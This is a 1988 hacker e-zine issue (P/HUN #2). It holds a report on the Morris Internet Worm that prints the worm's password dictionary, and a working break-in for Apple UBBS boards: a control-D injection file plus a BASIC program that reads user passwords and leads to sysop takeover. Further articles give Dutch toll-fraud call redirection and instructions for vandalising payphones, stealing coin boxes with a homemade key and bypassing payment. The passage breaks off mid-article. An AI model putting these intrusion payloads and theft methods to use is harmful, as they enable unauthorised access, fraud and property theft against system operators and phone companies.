()---------------------------------------------------------------------------() P/HUN Volume 1 , Issue #2 (c)88' Articles 8 + Introduction Released : December 14th 1988 Comments: Christmas Issue --==> The Hackers Den88 <==-- (718)358/9209 "P/HUN Headquarters" 2600 Bulletin Board System #5 +-------------------------------+ Proudly presents.... -== P/HUN Issue #2 ==- ---------------- Volume 1 , P/HUN Issue #2 - Phile #1 of 9 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= I am proud to say that we have been getting a lot of support from people all over the States and also some parts of Europe like London & Holand. Our last newsletter was definately a success even though it was our first issue. We at the Hackers Den88 are trying our very best to satisfy our readers. Listed below are the boards that P/HUN Issues can regularly be found on, besides The Hackers Den88(Home of P/HUN Newsletter) : ** The Phoenix Project ** ** Digital Logic Data Systems ** ** The Central Office (2600 BBS #2) ** We are currently looking for someone who could write P/HUN World News. This segment will contain various news and happenings around the world and U.S ,pertaining to areas in P/H If you think you are expeirenced enough handle the job ,let us know. Hopefully PHUN World News will be in the next issue. +++++++++++++++++++++++ I would also like to state that The Hackers Den88 is now an official 2600 Magazine Bulletin Board #5. I would to thank "The DataMaster",SysOp of the The Central Office (2600 BBS #2) for all is help and support. +++++++++++++++++++++++ If you wish to Subcribe to The 2600 Magazine: Yearly Subscription: US & Canada -- $15 individual, $40 corporate Overseas -- $25 individual, $55 corporate Back Issues available for 1984,1985,1986,1987 at $25 per year, $30 overseas Send to : 2600 MAGAZINE SUBCRIPTION DEPT., P.O Box 752 Middle Island N.Y 11953 Telephone: (516)751/2600 +++++++++++++++++++++++ As you aleardy know P/HUN is always on the look out for good articles that deal in DEFEATING COMPUTER SECURITY,TELECOMMUNICATIONS,AMATURE RADIO,CABLE DESCRAMBLING & PYROTECHNICS. If anyone has the whole list of ANACs for all NPAs ,upload it for the forecoming issue. Many have requested articles on Moblile Phreaking,DataNet,Latest with ISDN, information pertaining to 5ESS and Adjunct Frames. Mobile Phreaking seems to be at the top of our list. If you wish to submit to P/HUN please contact me at the Hackers Den88 . If your article proves to be intresting it will be published in our forecoming newsletter. The next issue will be out somewhere in February of 1989. Have a wonderfull Christmas with best wishes for the Newyear from all of us at the Hackers Den88. Well here it is P/HUN Issue #2 .... Enjoy! Red Knight SysOp of The Hackers Den88 P/HUN! TSAN! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Table of Contents: ------------------ # Description Writer Size -- ------------------------------------------ -------- ---- 1 - Introduction & Contents Red Knight 4K 2 - A report on the InterNet Worm Bob Page 16K 3 - Defeating Security of Apple's UBBS Evil Mind 8K 4 - Hacking in Holand & its Numbering Method Rop & Key 10K 5 - Things to do with 'Third Party Payphones' The Jedi 10K 6 - An Indepth Guide in Hacking the Unix + BNU Red Knight 42K 7 - Guide to "The Pick Operating System" Mr. Slippery 13K 8 - A Novice's Guide to Hacking - 1989 Edition The Mentor 42K 9 - Telephone-Controlled Tape Starter NY Hacker 5K =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = Volume 1 , P/HUN Issue #2 , Phile #2 of 9 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= A REPORT ON THE INTERNET WORM Bob Page University of Lowell Computer Science Department November 7, 1988 [Because of the many misquotes the media have been giving, this report is Copyright (c) Bob Page, all rights reserved. Permission is granted to republish this ONLY if you republish it in its entirety.] Here's the scoop on the "Internet Worm". Actually it's not a virus - a virus is a piece of code that adds itself to other programs, including operating systems. It cannot run independently, but rather requires that its "host" program be run to activate it. As such, it has a clear analog to biologic viruses -- those viruses are not considered live, but they invade host cells and take them over, making them produce new viruses. A worm is a program that can run by itself and can propagate a fully working version of itself to other machines. As such, what was loosed on the Internet was clearly a worm. This data was collected through an emergency mailing list set up by Gene Spafford at Purdue University, for administrators of major Internet sites - some of the text is included verbatim from that list. Mail was heavy since the formation of the list; it continues to be on Monday afternoon - I get at least 2-3 messages every hour. It's possible that some of this information is incomplete, but I thought you'd like to know what I know so far. The basic object of the worm is to get a shell on another machine so it can reproduce further. There are three ways it attacks: sendmail, fingerd, and rsh/rexec. THE SENDMAIL ATTACK: In the sendmail attack, the worm opens a TCP connection to another machine's sendmail (the SMTP port), invokes debug mode, and sends a RCPT TO that requests its data be piped through a shell. That data, a shell script (first-stage bootstrap) creates a temporary second-stage bootstrap file called x$$,l1.c (where '$$' is the current process ID). This is a small (40-line) C program. The first-stage bootstrap compiles this program with the local cc and executes it with arguments giving the Internet hostid/socket/password of where it just came from. The second-stage bootstrap (the compiled C program) sucks over two object files, x$$,vax.o and x$$,sun3.o from the attacking host. It has an array for 20 file names (presumably for 20 different machines), but only two (vax and sun) were compiled in to this code. It then figures out whether it's running under BSD or SunOS and links the appropriate file against the C library to produce an executable program called /usr/tmp/sh - so it looks like the Bourne shell to anyone who looked there. THE FINGERD ATTACK: In the fingerd attack, it tries to infiltrate systems via a bug in fingerd, the finger daemon. Apparently this is where most of its success was (not in sendmail, as was originally reported). When fingerd is connected to, it reads its arguments from a pipe, but doesn't limit how much it reads. If it reads more than the internal 512-byte buffer allowed, it writes past the end of its stack. After the stack is a command to be executed ("/usr/ucb/finger") that actually does the work. On a VAX, the worm knew how much further from the stack it had to clobber to get to this command, which it replaced with the command "/bin/sh" (the bourne shell). So instead of the finger command being executed, a shell was started with no arguments. Since this is run in the context of the finger daemon, stdin and stdout are connected to the network socket, and all the files were sucked over just like the shell that sendmail provided. THE RSH/REXEC ATTACK: The third way it tried to get into systems was via the .rhosts and /etc/hosts.equiv files to determine 'trusted' hosts where it might be able to migrate to. To use the .rhosts feature, it needed to actually get into people's accounts - since the worm was not running as root (it was running as daemon) it had to figure out people's passwords. To do this, it went through the /etc/passwd file, trying to guess passwords. It tried combinations of: the username, the last, first, last+first, nick names (from the GECOS field), and a list of special "popular" passwords: aaa cornelius guntis noxious simon academia couscous hacker nutrition simple aerobics creation hamlet nyquist singer airplane creosote handily oceanography single albany cretin happening ocelot smile albatross daemon harmony olivetti smiles albert dancer harold olivia smooch alex daniel harvey oracle smother alexander danny hebrides orca snatch algebra dave heinlein orwell snoopy aliases december hello osiris soap alphabet defoe help outlaw socrates ama deluge herbert oxford sossina amorphous desperate hiawatha pacific sparrows analog develop hibernia painless spit anchor dieter honey pakistan spring andromache digital horse pam springer animals discovery horus papers squires answer disney hutchins password strangle anthropogenic dog imbroglio patricia stratford anvils drought imperial penguin stuttgart anything duncan include peoria subway aria eager ingres percolate success ariadne easier inna persimmon summer arrow edges innocuous persona super arthur edinburgh irishman pete superstage athena edwin isis peter support atmosphere edwina japan philip supported aztecs egghead jessica phoenix surfer azure eiderdown jester pierre suzanne bacchus eileen jixian pizza swearer bailey einstein johnny plover symmetry banana elephant joseph plymouth tangerine bananas elizabeth joshua polynomial tape bandit ellen judith pondering target banks emerald juggle pork tarragon barber engine julia poster taylor baritone engineer kathleen praise telephone bass enterprise kermit precious temptation bassoon enzyme kernel prelude thailand batman ersatz kirkland prince tiger beater establish knight princeton toggle beauty estate ladle protect tomato beethoven euclid lambda protozoa topography beloved evelyn lamination pumpkin tortoise benz extension larkin puneet toyota beowulf fairway larry puppet trails berkeley felicia lazarus rabbit trivial berliner fender lebesgue rachmaninoff trombone beryl fermat lee rainbow tubas beverly fidelity leland raindrop tuttle bicameral finite leroy raleigh umesh bob fishers lewis random unhappy brenda flakes light rascal unicorn brian float lisa really unknown bridget flower louis rebecca urchin broadway flowers lynne remote utility bumbling foolproof macintosh rick vasant burgess football mack ripple vertigo campanile foresight maggot robotics vicky cantor format magic rochester village cardinal forsythe malcolm rolex virginia carmen fourier mark romano warren carolina fred markus ronald water caroline friend marty rosebud weenie cascades frighten marvin rosemary whatnot castle fun master roses whiting cat fungible maurice ruben whitney cayuga gabriel mellon rules will celtics gardner merlin ruth william cerulean garfield mets sal williamsburg change gauss michael saxon willie charles george michelle scamper winston charming gertrude mike scheme wisconsin charon ginger minimum scott wizard chester glacier minsky scotty wombat cigar gnu moguls secret woodwind classic golfer moose sensor wormwood clusters gorgeous morley serenity yaco coffee gorges mozart sharks yang coke gosling nancy sharon yellowstone collins gouge napoleon sheffield yosemite commrades graham nepenthe sheldon zap computer gryphon ness shiva zimmerman condo guest network shivers cookie guitar newton shuttle cooper gumption next signature [I wouldn't have picked some of these as "popular" passwords, but then again, I'm not a worm writer. What do I know?] When everything else fails, it opens /usr/dict/words and tries every word in the dictionary. It is pretty successful in finding passwords, as most people don't choose them very well. Once it gets into someone's account, it looks for a .rhosts file and does an 'rsh' and/or 'rexec' to another host, it sucks over the necessary files into /usr/tmp and runs /usr/tmp/sh to start all over again. Between these three methods of attack (sendmail, fingerd, .rhosts) it was able to spread very quickly. THE WORM ITSELF: The 'sh' program is the actual worm. When it starts up it clobbers its argv array so a 'ps' will not show its name. It opens all its necessary files, then unlinks (deletes) them so they can't be found (since it has them open, however, it can still access the contents). It then tries to infect as many other hosts as possible - when it sucessfully connects to one host, it forks a child to continue the infection while the parent keeps on trying new hosts. One of the things it does before it attacks a host is connect to the telnet port and immediately close it. Thus, "telnetd: ttloop: peer died" in /usr/adm/messages means the worm attempted an attack. The worm's role in life is to reproduce - nothing more. To do that it needs to find other hosts. It does a 'netstat -r -n' to find local routes to other hosts & networks, looks in /etc/hosts, and uses the yellow pages distributed hosts file if it's available. Any time it finds a host, it tries to infect it through one of the three methods, see above. Once it finds a local network (like 129.63.nn.nn for ulowell) it sequentially tries every address in that range. If the system crashes or is rebooted, most system boot procedures clear /tmp and /usr/tmp as a matter of course, erasing any evidence. However, sendmail log files show mail coming in from user /dev/null for user /bin/sed, which is a tipoff that the worm entered. Each time the worm is started, there is a 1/15 chance (it calls random()) that it sends a single byte to ernie.berkeley.edu on some magic port, apparently to act as some kind of monitoring mechanism. THE CRACKDOWN: Three main 'swat' teams from Berkeley, MIT and Purdue found copies of the VAX code (the .o files had all the symbols intact with somewhat meaningful names) and disassembled it into about 3000 lines of C. The BSD development team poked fun at the code, even going so far to point out bugs in the code and supplying source patches for it! They have not released the actual source code, however, and refuse to do so. That could change - there are a number of people who want to see the code. Portions of the code appear incomplete, as if the program development was not yet finished. For example, it knows the offset needed to break the BSD fingerd, but doesn't know the correct offset for Sun's fingerd (which causes it to dump core); it also doesn't erase its tracks as cleverly as it might; and so on. The worm uses a variable called 'pleasequit' but doesn't correctly initialize it, so some folks added a module called _worm.o to the C library, which is produced from: int pleasequit = -1; the fact that this value is set to -1 will cause it to exit after one iteration. The close scrutiny of the code also turned up comments on the programmer's style. Verbatim from someone at MIT: From disassembling the code, it looks like the programmer is really anally retentive about checking return codes, and, in addition, prefers to use array indexing instead of pointers to walk through arrays. Anyone who looks at the binary will not see any embedded strings - they are XOR'ed with 81 (hex). That's how the shell commands are imbedded. The "obvious" passwords are stored with their high bit set. Although it spreads very fast, it is somewhat slowed down by the fact that it drives the load average up on the machine - this is due to all the encryptions going on, and the large number of incoming worms from other machines. [Initially, the fastest defense against the worm is is to create a directory called /usr/tmp/sh. The script that creates /usr/tmp/sh from one of the .o files checks to see if /usr/tmp/sh exists, but not to see if it's a directory. This fix is known as 'the condom'.] NOW WHAT? None of the ULowell machines were hit by the worm. When BBN staffers found their systems infected, they cut themselves off from all other hosts. Since our connection to the Internet is through BBN, we were cut off as well. Before we were cut off, I received mail about the sendmail problem and installed a patch to disable the feature the worm uses to get in through sendmail. I had made local modifications to fingerd which changed the offsets, so any attempt to scribble over the stack would probably have ended up in a core dump. Most Internet systems running 4.3BSD or SunOS have installed the necessary patches to close the holes and have rejoined the Internet. As you would expect, there is a renewed interest in system/network security, finding and plugging holes, and speculation over what will happen to the worm's creator. If you haven't read or watched the news, various log files have named the responsible person as Robert Morris Jr., a 23-year old doctoral student at Cornell. His father is head of the National Computer Security Center, the NSA's public effort in computer security, and has lectured widely on security aspects of UNIX. Associates of the student claim the worm was a 'mistake' - that he intended to unleash it but it was not supposed to move so quickly or spread so much. His goal (from what I understand) was to have a program 'live' within the Internet. If the reports that he intended it to spread slowly are true, then it's possible that the bytes sent to ernie.berkeley.edu were intended to monitor the spread of the worm. Some news reports mentioned that he panicked when, via some "monitoring mechanism" he saw how fast it had propagated. A source inside DEC reports that although the worm didn't make much progress there, it was sighted on several machines that wouldn't be on its normal propagation path, i.e. not gateways and not on the same subnet. These machines are not reachable from the outside. Morris was a summer intern at DEC in '87. He might have included names or addresses he remembered as targets for infesting hidden internal networks. Most of the DEC machines in question belong to the group he worked in. The final word has not been written - I don't think the FBI have even met with this guy yet. It will be interesting to see what happens. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = Volume 1 , P/HUN Issue #2 , Phile #3 of 9 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Defeating Security on Apple's UBBS ---------------------------------- Writen by Evil Mind of CTG Computer Terrorists Guild Introduction ------------- Hello fellow hackers are phreakers, I'm here to tell you all about Apple's UBBS. This is a nice little program that will make any Apple computer with a modem have the ability to be a bbs. It can be on any storage device, from a 5.25 disk, to a chain of hard drives. I doubt any hackers or phreakers are using this program, because everyone (in Apple's world) uses GBBS. So, let's get down to business. For flexability, UBBS has been written in BASIC. For our convience, hackers with a knowledge of universial basic (or better yet, knowledge of Apple BASIC) will have a good time. The only catch is, the control-c (break basic programs) is screened out by a ml routine before it hits basic. But, no need to fear, discussion on hacking it is later. When a sysop first uses a UBBS program, the sysop must run the program SYSGEN.... which is for System Generation, the "Creator Program" for the board. Questions are name of board, sysop's name, bullitin's names, and other things needed before the next program is run: LOGON... which will then put the computer in answer mode. Let's say some guy calls a few days later. The LOGON program will then display a bbs title, then something like "Enter your name or press <RETURN> for NEW." So, this guy does a <RETURN> for new... questions are asked, and then the sysop validates him. Normal procedure like any other bbs program. Hacking it ----------- Once in the system, get access to the <F>eatures section which hopefully has a up/downloading section. If they give a lame excuse of not giving it to you because of an IBM, lie in the validation part, and say you own an Apple. First, upload some text file... like a list of bbs numbers. If the file needs to be validated by the sysop before further access from the public, then it will be hard to hack it out. (Explained later.) Now, at least you have some access... hopefully the u/d ratio is 1:1 or better. So, upload two more files! File #1 -------- This is the most important file in the hacking process. This file should contain the following or simular to it: (<CR>=<RETURN>) This is a TEXT file. ------------------------------------------------------------------------------ THIS IS A POEM<CR> <CR> <Control-D>CAT<CR> RAT<CR> DOG<CR> PAT<CR> <CR> BY MR. WALTHER<CR> ------------------------------------------------------------------------------ File explained: Well, the control D is needed. If you can't enter it from your word processor, then enter "DCAT" and go in with a disk editor and change character D into hex $04, which is a control-d to Apple. Normally, control-d is within programs, used to run disk commands from basic. When viewed, it will catalog the current storage device (hard, 3.5, or 5.25) and will be stuck in a "zombie" mode. Also, when downloading this file, view it, don't use Xmodem. But upload file #2 with it, so you can hack in one call and delete your tracks. File #2 -------- Well, this program is supposed to be basic, but since a lot of hackers I know have IBM's, I'll make it hackable from both Apple and IBM. Make the following TEXT, that's right, text file. ------------------------------------------------------------------------------ 10 ONERR GOTO 1000 20 HOME 30 PRINT "A DISK PREFIXER" 40 PRINT 50 PRINT "<P>REFIX <C>ATALOG <V>IEW <D>ELETE <R>UN" 60 INPUT A$ 70 IF A$<>"P" OR A$<>"p" THEN 100 80 PRINT "PREFIX WHAT? (RETURN FOR LIST, OR FOLLOW EXAMPLE: /HARD1/BBS" 90 INPUT A$: PRINT CHR$(4);"PREFIX ";A$: GOTO 40 100 IF A$<>"C" OR A$<>"c" THEN 120 110 PRINT CHR$(4);"CATALOG": GOTO 40 120 IF A$<>"D" OR A$<>"d" THEN 150 130 PRINT "DELETE WHAT FILE?" 140 INPUT A$: PRINT CHR$(4);"DELETE ";A$: GOTO 40 150 IF A$<>"R" OR A$<>"r" THEN 180 160 PRINT "RUN WHICH FILE?" 170 INPUT A$: PRINT CHR$(4);"RUN ";A$: GOTO 40 180 IF A$<>"V" AND A$<>"v" THEN PRINT "NOT A COMMAND": GOTO 40 190 PRINT "VIEW WHICH FILE?" 200 INPUT A$: PRINT CHR$(4);"OPEN ";A$: PRINT CHR$(4);"READ ";A$ 210 ONERR GOTO 230 220 INPUT B$: PRINT B$: GOTO 220 230 PRINT CHR$(4);"CLOSE ";A$: ONERR GOTO 1000 240 GOTO 40 1000 PRINT "ERROR!": CALL -1370 ------------------------------------------------------------------------------ Upload the files. When asked about file #2, say it's a TXT file. Now view file #1. It will catalog (or DIR) the disk, and then be in a "zombie" state. This is when the basic thinks the disk is still being read, and is really stuck, for you to enter things. To clear that up, the INPUT command is used both for keyboard input, or in the correct conditions (that UBBS uses), disk input from text files! If you can't see it yet, press a control-D and a disk command. The real intention is to run file #2, which will do the hacking. But, File#2 and File#1 might be in a different directory than the transfer program. Use these commands: (With a control-D before them) CAT to see what is on the disk. Example: ]CAT /HARD1 (PREFIX NAME) PROGRAMS DIR 10-NOV-88 2 PRODOS SYS 06-APR-81 32 BASIC.SYSTEM SYS 07-APR-81 20 BASIC.PROGRAMS BAS 10-NOV-88 5 ML.PROGRAMS BIN 10-NOV-88 7 READ.ME TXT 10-NOV-88 10 In which case, should explore further with a ]PREFIX /HARD1/PROGRAMS ]CAT /HARD1/PROGRAMS LOGON BAS 10-APR-84 54 SYSOP BAS 10-APR-84 34 Once you explore enough to fine your files, do an: ]EXEC file#2 Replace "file#2" with whatever you named the second file. Note: exploring will take a long time, because you might need to find some other things to intrest you, like the logon program (which can be in another directory). When exploring in the zombie state, the computer sometimes zaps out back into normal running mode. Re-download and start where you left off. Then it'll go: A DISK PREFIXER <P>REFIX <C>ATALOG <D>ELETE <V>IEW <R>UN ? Then enter the desired one, in this case, "P" and press enter. Here's how to work them: Examples: from basic ]PREFIX /HARD1/FILES (to get to the diectory /hard1/files) ]PREFIX /HARD1/ (to get back to /hard1) ]PREFIX (tells you what the current prefix is) ]CATALOG (DIR a disk for you) ]RUN LOGON (Go back to LOGON program) View is a different thing, and can't be done from basic. In this case, choose "V" for view, (beforehand, find the userinfo file, a text file.) And when it goes: VIEW WHICH FILE? ? type in a pathname.... example: VIEW WHICH FILE? ?/HARD1/BBS/USERINFO.DATA and it'll show the passwords. Explore! There are a lot of things to do. One last word before you finish, the sysop is 001, find his password, log in as him, then make all your accounts from there (because he validates and creates accounts.) The form for UBBS passwords are: NNNCCCC where N is a number, and C is a character. example: 001SYSOP. Also, 001SYSOP is the default password? (I'm not sure, but I think it is.) Try it on a new board and see if the sysop didn't change it yet. So if your victim board doesn't have the requirements, just use a password scanner and try out 001AAAA 001AAAB and all, and eventually you can get it in a matter of weeks. (No lowercase or control characters are accepted by UBBS.) All in a nutshell, here's another example: ------------------------------------------------------------------------------ Welcome to a UBBS system. Enter name or press return for new users XXXXXXX checking password. Hello Mr. Bill, today is 00/00/00 news for today: This is a new board and hope ya enjoy it, Your sysop, Tom Hacket. No Email waiting Email>Quit Main level: B/A/G/J/N/F/Q/Help >Features loading xfer, please wait... Xfer command> Upload choose protocol: X>modem T>ext Xmodem (upload files) 70 blocks recieved.... Information: What is file#1's type: TXT What is file#2's type: TXT Thank you. Xfer command> Download Download what file? TEST.UPLOAD (file#1) THIS IS A POEM /HARD1/ONLINE CALLER.LOG 06 TXT USER.INFO 65 TXT LOGON 45 BAS SYSGEN 65 BAS TEST.UPLOAD 02 TXT PREFIXER 03 TXT LEECHES 02 TXT (Zombie state) (control-D)EXEC PREFIXER(return) A DISK PREFIXER <C>ATALOG <V>IEW <R>UN <D>ELETE <P>REFIX ?B NOT A COMMAND! <C>ATALOG <V>IEW <R>UN <D>ELETE <P>REFIX ?V VIEW WHICH FILE? ?USER.INFO (list of passwords) <C>ATALOG <V>IEW <R>UN <D>ELETE <P>REFIX ?R RUN WHICH FILE? ?LOGON (Automatically hangs up, you re-call, then log in as sysop, and make another account with good access.) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = Volume 1 , P/HUN Issue #2 , Phile #4 of 9 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Hacking In Holand & The Numbering Plan -------------------------------------- By: Rop and The Key In Holland, hacking started out late. The first real hacks were done in the early eighties. Among these hacks was the 'RIVM hack', hacking the computer of the dutch health-inspection (FDA). Because even patient names were listed here this got a lot of publicity. Around 1984/1985 the movement grew rapidly because of the movie 'Wargames' and publications in the "Volkskrant", the country's major left-wing newspaper. It was around these days two students hacked the '008 computer', the directory-assistance system, owned by our local Ma-Bell clone, the PTT. Because hackers had access to a lot of unlisted phone numbers this was front-page news in all of Europe. Shortly after this hack, Jan Jacobs published the book 'kraken en computers' (hacking and computers), about the uprise of the hacker movement in The Netherlands. Jan Jacobs is also a free-lance reporter for the 'Volkskrant' which explains their scoops on major hacking events. In those days, he himself was a hacker. Things remained relatively quiet, although the CCC kept scaring everybody with their marvelous hacks all over the world over the packet-network. X-25 hacking in Holland is relatively new, not because the net was not there, but because it was still to easy to use the telephone. Only recently dutch hackers discover that the X-25 net offers them the opportunity to make low-cost global hacks. Another group had sprung into life in the early eighties, phreaks. These phreaks concentrated on mobile phones however, because our ATF1 (car-phone 1) system is as leak as a basket. Using a CBM-64 or other simple hardware and an FM-tranceiver, every weirdo could make free calls all over the world. This lasted until there were so many illegal car-phones that the costs began affecting the total PTT turnover. The PTT then made it impossible for car-phone users to make international phone calls automatically and told their international operators to check for fraud carefully. By that time all the phreaks were rich from selling their technique 'to friends only', and bored stiff, because the PTT had taken their toy away. There was a new system, ATF2 (compatible to the scandinavian NMT system), but this was to complicated (in those days) to hack (considdering these people were not computer minds but mainly high-frequency experts). The phreaks met the hackers and they decided their goels were the same. The PTT phreaked out when the world found out that some of the leading hackers had switched to phreaking. When Personal Computer Magazine published an article about phreaks making free calls all over the world through an old exchange in Denmark (which could be reached free of charge), all hell broke loose. The magazine contained our list of frequencies for the CCITT-4 system, so suddenly everybody was a phonephreak. The free lines to Denmark were rerouted, some other gaps were closed, but no action could be taken against the phone phreaks (The Key and me among others), because no phone-fraud legislation exists in Holland. Can you imagine what it's like to live in a country that has NO phone-fraud laws? Since then things have cooled down (there are only about 40 real active hackers in the entire country, so things tend to get quiet every once in a while), but as soon as anything happens, we'll let you know. ROP & The Key Leave a message for ROP GONGGRIJP at NEABBS, Europe's biggest BBS, and I will give you THIS (The Hacker Information System) privs as soon as possible. +31 20 717666, all speeds/standards. --------------------------------------------------------------------------- - AND NOW PART TWO OF THE DUTCH SYSTEM, BY ROP & THE KEY OF NEABBS !!!!!!!- --------------------------------------------------------------------------- NUMBERING PLAN The dutch phone system has a numbering plan that is far more complicated than the american phone system. Telephone numbers can be divided in several classes: 0XX-YYYYYY[Y] Larger cities. XX is random (very large cities have a 0 as their last digit). 0XXYY-ZZZZ[Z] Smaller towns. XX is the number of the district (note: these numbers cannot be handed out to bigger cities). Holland has some 20 districts, amsterdam is 29. (the Amsterdam city code is 020) 00X 001X Special numbers, see below. 06-0XXX Free numbers 06-0XXXXXX Free numbers 06-022XXXX International Free Numbers, connect to foreign companies etc. (we even have a number for making AT&T calling card calls for free, 06-0229111). When all european borders disappear in 1992, this group is expected to grow rapidly! 06-3XXXXXXXX Special high cost numbers, mainly phone-sex (the owner gets 2.5 $ct./min, the PTT gets 22.5. This makes the PTT the country's biggest pimp) 06-4XXX Free numbers, explosive. (This means a lot of traffic at one time, TV-shows and the like) 06-4XXXXXX Free numbers, explosive. 06-51XXXXX Beepers (sorry, paging equipment) 06-52XXXXXX ATF2 (mobile phone system, NMT compatible) 06-524XXXXX ATF1, West and Middle Netherlands 06-525XXXXX ATF1, North Netherlands 06-526XXXXX ATF1, South Netherlands 06-8XXXXXXXX Split costs, the caller pays a portion of the costs, the called party pays as well (80%+80%=100% according to phone company arithmatic) 06-9XXXXXXXX Special high cost numbers, no phone-sex 09-....... International access. For the States i.e., we dial 09-1XXXYYYZZZZ. Our country code is 31. SPECIAL NUMBERS --------------- 002 Speaking clock 003 Weather 004 PTT-customer service (contradictio in terminis) 005 was the mobilophone network (pre-carphone mobile operator service), now tape telling callers that this service no longer exists. 006X Used by PTT for mechanics to call in. 0069 always plays a tape listing the home-phone number of the mechanic on duty for that region. 007 PTT-repairs (uses pigeons for further internal communication, judged by their working speed) 008 Directory assistance 009 Was message service, for telex and other services, their new number is 06-0409. tape. 0010 Was national operator, now 06-0410. tape. 0011 Once planned as a countrywide emergency number. Once they got to installing it they had the 06 exchange, which was newer and better, so the discussion started again...... tape now 0012 Telex number info 0013 Telex repairs 0014 0015 0016 Was international operator, now 06-0410. tape. 0017 Post office customer service 0018 Was international inquiries, now 06-0418. tape 0019 Dead TARIFFS ------- A toll-impulse costs 7.5 $ct, impulses are 50 Hz/48V pulses on both lines (tip and ring, called A and B here), so can only be detected relative to the ground potential. On modern exchanges you have to pay for these pulses, as well as for the DTMF-facility (sound familiar?). Calls cost more in the day time (0800/1800 hrs), than on weekdays. Within your low-tariff zone (about 30 miles around your home), it's one tick every 5 minutes, or once every 10 minutes at night, outside of that zone one tick every 1.5 minutes, 45 seconds at night. International calls from Holland are terribly expensive, USA costs $2.00 a minute, but there's a lot of countries that cost over $3.50 a minute. SPECIAL THINGS (everybody has some) -------------- 030-555555 for conference calls (operator only, she calls you back, so phreaks are out of the question). The do-it-yourself conference has not been invented here (yet). 06-0101 All sorts of special services, addresses from the phone book (costs $1.25 to get an address!) etc. Also national collect calls ($2.50 bonus for PTT, $1/min) *XXX*.....# Some exchanges have this feature. It means you redirect all calls for your phone to the given number (dots). PTT offers this service for a lot of money as *21*....#, but this is different. With the *XXX*...# feature the phone doesn't ring on the redirected phone (with the *21 feature it does three times before forwarding the call). The *XXX*....# feature is a non documented feature, even at the PTT not many people have heard of it. Alas, not many exchanges feature it. The XXX can easily be found because if you're one digit off the system reacts with a nonexistent-tone (three tones, each one higher than the preceeding one), so there's only 30 possibilities. Things like call-waiting, or even specified bills do not exist here (yet). When they come, they'll be expensive, that's for sure. PTT POLICY ---------- The company has a monopoly on all telecom facilities that expires next year (1989). Up till now we could not even buy our telephone sets somewhere else (legally). People finally realised this was ridiculous and decided to privatise the PTT Telecommunications department. The PTT remains in charge of the network however, and they can continue charging ridiculous amounts for it. The state monopoly is enabling the phone company to suck money from our pockets. HACKER POLICY ------------- Redirect phone lines to other numbers (they don't even know it exists, we do it all the time, to receive free collect calls). This trick courtesy of The KEY. Route calls through other countries to make things cheaper. (Spain was our favourite before they closed it off). Generally screw 'em...... ROP & THE KEY You can reach me on NEABBS, Europe's biggest BBS, +31 20 717666, all speeds/standards. Send a message to me, ROP GONGGRIJP, cosysop of THIS hacker board (The Hacker Information System). =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = Volume 1 , P/HUN Issue #2 , Phile #5 of 9 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Third Party Payphones --------------------- By: The Jedi Theres been alot of discussion lately about paperclipping and redboxing on payphones so I decided to write up an article about that subject to be included in this issue of PHUN. Here are a few things that you'd might find interesting about payphones.... NOTE: All the payphones discussed in this article refer to Non-New York Telephone PayPhones. There are plenty of third party payphones in New York. The easiest way to tell if the payphone is from New York Tel is to look right under the keypad where is says what numbers to dial for information. All New York Payphones will have their Logo printed somewhere on that label. If it isn't New York Tel, there will be a company name and number listed to call for refunds. Thats the company that owns and operates that perticular payphone. 2 - Ripping off the handsets. Now exactly the best way to phuck over the phone company but still is fun if you have nothing else to do. Just take a pair of pliers, grip them, and turn the opposite direction of the way that the steel is woven. This will expose the wires. Cut the wires, and bring your handset home with you!! 3 - Breaking into the jack. From what I've seen by repairing payphones, all the ones that I've seen have a regular phone jack somewhere in the fortress or nearby. This allows you do do a great many things. First lets talk about the jack's location. The fortress phones that have those big green walls to then are the easiest ones to get into. The location of the jack is in the "Stem". Right about Knee high there should be a green plate with 6 or so wierd looking screws holding it in place. To get that panel off requires a special screwdriver. Somewhat like a "Allen Wrench" with a little hole in the middle. You can probably pick up a screwdriver like this in most hardware stores. On the fortress phones that are silver and skinny, the jack is usually location in the ground underneath cement. Don't even bother with them. On payphones located inside stores, just follow the two wires coming out of the phone, it should lead to a beige box with a lock on it. Pick the lock or break open the box and you'll see the jack. Ok, now that you're into the jack, you can dial anywhere you'd like to. Remember, that phone jack is almost exactly like the jack you have in your house. Just pick up a cheap $5 phone from radio shack [A small one preferrably since you dont want to look obvious] and hook it in! By doing this, you're bypassing all the security of the phone [etc...Please Deposit .10 cents for the next XX mins.]. 4 - Get the Coin Box! Not that easy but one of my friends managed to bring home a parking meter so it IS possible!! Theres two locks you must get past in order to get to the coin box. First, get a piece of metal and make the following..... ___ __| |__ |__ __|<===-- about 1/4 of an inch | | ________| |________ / X | | X___________________/ This key will allow you to get past the lock in the front of the payphone. Ok, pick the lock on the bottom left-hand side of the payphone [or drill a hole in it] and then put that key in the front lock and turn it clockwise [to the right for those of you that can't tell time! heh]. Pull out the coin box and go and play 2000 video games!! Each coin box holds up to a maximum of $150-175 dollars. 5 - Reprogramming the payphone. The most fun thing and also most dangerous! First off, these aren't the stupid NY Telephones, they will call back the company automatically if you dont do this correctly! All of the phones that I work on have burnt-in Eproms that are for service. You can do things 